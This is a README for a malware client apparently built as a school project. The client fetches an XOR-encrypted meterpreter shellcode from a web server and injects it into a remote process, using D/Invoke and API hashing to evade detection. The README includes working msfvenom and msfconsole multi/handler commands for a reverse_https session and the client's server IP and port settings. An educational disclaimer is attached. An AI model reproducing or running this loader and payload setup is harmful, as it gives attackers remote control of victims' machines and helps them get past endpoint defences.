A malware which is able to inject a malicious shellcode into a process

EBMBA/ICS-Malware-Client

ICS-Malware-Client

Introduction

The main goal of this project is to build a malware sample that is able to inject a malicious shellcode into a process.
When started, it should spawn a meterpreter session for the malicious user to access.

Disclaimer:

This program is developed as a part of a school project.
It is intended for educational purposes only.
Any use of this program for malicious or unauthorized activities is strictly prohibited.
The developer and the institution are not responsible for any misuse of this program.

Features implemented in the program:

  • D/Invoke ✔️
  • API Hashing ✔️
  • Use only native functions ✔️
  • Get the payload on a web server ✔️
  • Decrypt the payload (XOR) ✔️
  • Execute the payload on a remote process ✔️

Bonus:

  • The payload is not a shellcode ❌
  • The web server configuration is encrypted and decrypted on the fly ✔️
  • Have a web server (in any language) ✔️
  • That encrypts the payload on the fly ✔️
  • That implements checks on the origin of the request via an ID and/or a user agent to be set in the config ✔️
  • Implements a key exchange (not necessarily Diffie-Hellman, it could simply be a POST with the encryption key to use) ✔️

How to use it

Server

First you need to set up the server in order for the malware to work.
Clone the repository: https://github.com/EBMBA/ICS-Malware-Project-Server
In the cloned repository, run this command:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.5 LPORT=443 -f raw -o shellcode.hex

This will generate the shellcode (meterpreter) that we need.
Now that you have the shellcode, you can start the server by following these steps:
https://github.com/EBMBA/ICS-Malware-Project-Server#readme

Open a new terminal and start the meterpreter handler:

  • msfconsole
  • use multi/handler
  • set payload windows/x64/meterpreter/reverse_https
  • set LPORT 443
  • set LHOST 10.0.2.5
  • run

You should now have two terminals: one with the meterpreter handler listening and the other with the web server started.

Client

First you need to open the solution (.sln).
After the web server and the meterpreter handler are started, we need to configure the malware.
In Winhttp-Request.h you need to set two constants:

// IP address and port of the server (change these to match your own server)
const LPCWSTR SERVER_IP_ADDRESS = L"10.0.2.5";
const int SERVER_PORT = 5001;

Now you can launch the program.
If all the checks pass, you should be able to access the client machine from the meterpreter session.
